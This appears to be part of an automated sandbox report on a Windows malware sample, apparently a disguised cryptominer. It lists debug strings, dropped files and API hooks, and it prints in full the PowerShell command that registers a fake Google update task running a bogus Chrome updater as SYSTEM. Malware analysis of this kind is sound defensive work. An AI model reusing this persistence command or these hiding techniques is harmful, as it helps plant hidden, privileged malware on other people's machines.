Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbdll source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000027.00000000.1777078307.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2661252404.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: mscorlib.pdbp source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000027.00000000.1777039150.0000016F9BC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2660788551.0000016F9BC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdb) source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000027.00000000.1777078307.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2661252404.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000027.00000000.1777039150.0000016F9BC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2660788551.0000016F9BC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctC19B.tmp.pdb source: svchost.exe, 00000027.00000000.1777078307.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2661252404.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbSystem.Management.dll source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831d0 @ source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC32000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdbMZ@ source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: mscorlib.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.pdb/ source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb821* source: svchost.exe, 00000027.00000000.1777078307.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2661252404.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERE4D.tmp.dmp.10.dr

Data Obfuscation

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }			Jump to behavior

Source: zufmUwylvo.exe

Static PE information: 0x9AEB43BA [Sun May 12 06:52:42 2052 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: ..>f

Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: .xdata
Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: .yuZ
Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: .e;T
Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: ."Ki
Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: ..>f
Source: updater.exe.3.dr	Static PE information: section name: .xdata
Source: updater.exe.3.dr	Static PE information: section name: .yuZ
Source: updater.exe.3.dr	Static PE information: section name: .e;T
Source: updater.exe.3.dr	Static PE information: section name: ."Ki
Source: updater.exe.3.dr	Static PE information: section name: ..>f
Source: jscseoeoqftm.tmp.45.dr	Static PE information: section name: _RANDOMX
Source: jscseoeoqftm.tmp.45.dr	Static PE information: section name: _TEXT_CN
Source: jscseoeoqftm.tmp.45.dr	Static PE information: section name: _TEXT_CN
Source: jscseoeoqftm.tmp.45.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF7C0DC7560 push ebx; iretd	0_2_00007FF7C0DC756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF7C0CAD2A5 pushad ; iretd	24_2_00007FF7C0CAD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF7C0DC19AB pushad ; ret	24_2_00007FF7C0DC19B9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF7C0DC3A79 pushad ; ret	24_2_00007FF7C0DC3AC9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF7C0DC3A36 pushad ; ret	24_2_00007FF7C0DC3AC9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF7C0DC0FB9 push cs; iretd	24_2_00007FF7C0DC0FBA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF7C0DC7B9A push eax; ret	24_2_00007FF7C0DC7B99
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF7C0DC7B8A push eax; ret	24_2_00007FF7C0DC7B99
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF7C0DC2325 push eax; iretd	24_2_00007FF7C0DC233D
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC5FFA84FD push rcx; retf 003Fh	27_2_000001FC5FFA84FE
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC5FFA22B8 push rdx; retf	27_2_000001FC5FFA22B9
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC603994FD push rcx; retf 003Fh	27_2_000001FC603994FE
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC603C22B8 push rdx; retf	27_2_000001FC603C22B9
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC603C84FD push rcx; retf 003Fh	27_2_000001FC603C84FE
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C73584FD push rcx; retf 003Fh	30_2_00000161C73584FE
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C73522B8 push rdx; retf	30_2_00000161C73522B9
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C73894FD push rcx; retf 003Fh	30_2_00000161C73894FE
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91C84FD push rcx; retf 003Fh	31_2_00000233B91C84FE
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91C22B8 push rdx; retf	31_2_00000233B91C22B9
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91F94FD push rcx; retf 003Fh	31_2_00000233B91F94FE
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_00000210919084FD push rcx; retf 003Fh	32_2_00000210919084FE
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_00000210919022B8 push rdx; retf	32_2_00000210919022B9
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_00000210919394FD push rcx; retf 003Fh	32_2_00000210919394FE
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_00000210919784FD push rcx; retf 003Fh	32_2_00000210919784FE
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_00000210919722B8 push rdx; retf	32_2_00000210919722B9
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E9784FD push rcx; retf 003Fh	33_2_000002062E9784FE
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E9722B8 push rdx; retf	33_2_000002062E9722B9
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E9A94FD push rcx; retf 003Fh	33_2_000002062E9A94FE
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8D822B8 push rdx; retf	34_2_00000282B8D822B9
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8D884FD push rcx; retf 003Fh	34_2_00000282B8D884FE
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8DB94FD push rcx; retf 003Fh	34_2_00000282B8DB94FE

Source: zufmUwylvo.exe, DiybvPeeTbqiC.cs	High entropy of concatenated method names: 'qBYKDCTiybvbxhcPVVVIt', 'dCgjRneYuZtuJwoIOzsUkXgUR', 'CDFVNtsqYVdTkfEagViDYfbN', 'VQZPGWMSVlaS', 'LzBTYSevOMPJqKmNY', 'bsOrdTaSzRAPueIIK', 'CEHJjLHDJFQMaFxOyaKT', 'hsFTNuzSlBiADKTP', 'JCkZKVCmqvSffhx', 'MVMBpVRIlYEiMWudzfRHjwX'
Source: zufmUwylvo.exe, ekICtOIWXJ.cs	High entropy of concatenated method names: 'swabLfmNIaglcePbRGW', 'tcLsoRlnFyRfwI', 'NFFLQeUbbxzgYdnqPAtlPlhm', 'uzIJJBoTjCWMvGlYAkupkNJR', 'BeDWfcXSRVeM', 'RwLMobReUuINOAm', 'JhqqBHWkxEaytdkGLiSydYYhA', 'hkvIQblVIooVQKaaPkB', 'krJBCfioTlIIqXa', 'ponyNYUvRpSHXDIoghspa'
Source: zufmUwylvo.exe, roSrfIIxQdQfrmEdXbvoNPsM.cs	High entropy of concatenated method names: 'XcyJWwHAMPWCwOgGMEFhlAo', 'fOJnXobOeWdJNrQeaje', 'fulhNOrQWCGXnT', 'HmUcYnHXZkWsVnbGCWb', 'kccZJxKscPFVtMIrGGFZYWLwq', 'WcuvEBMUteKuSbdP', 'KfByIfjAvQBbORfjnahxgLEJ', 'TdgLnewIbBRpWOxLv', 'kKtfNfLfAvRO', 'arZpCCpIlFSnQNuRMkmlDTzfn'

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\jscseoeoqftm.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	File created: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Windows\Temp\jscseoeoqftm.tmp

Jump to dropped file

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JSCSEOEOQFTM.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\JSCSEOEOQFTM.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\JSCSEOEOQFTM.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\JSCSEOEOQFTM.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Memory written: PID: 6128 base: 7FF841A30008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Memory written: PID: 6128 base: 7FF8418CD9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: PID: 5804 base: 7FF841A30008 value: E9 EB D9 E9 FF
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: PID: 5804 base: 7FF8418CD9F0 value: E9 20 26 16 00

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
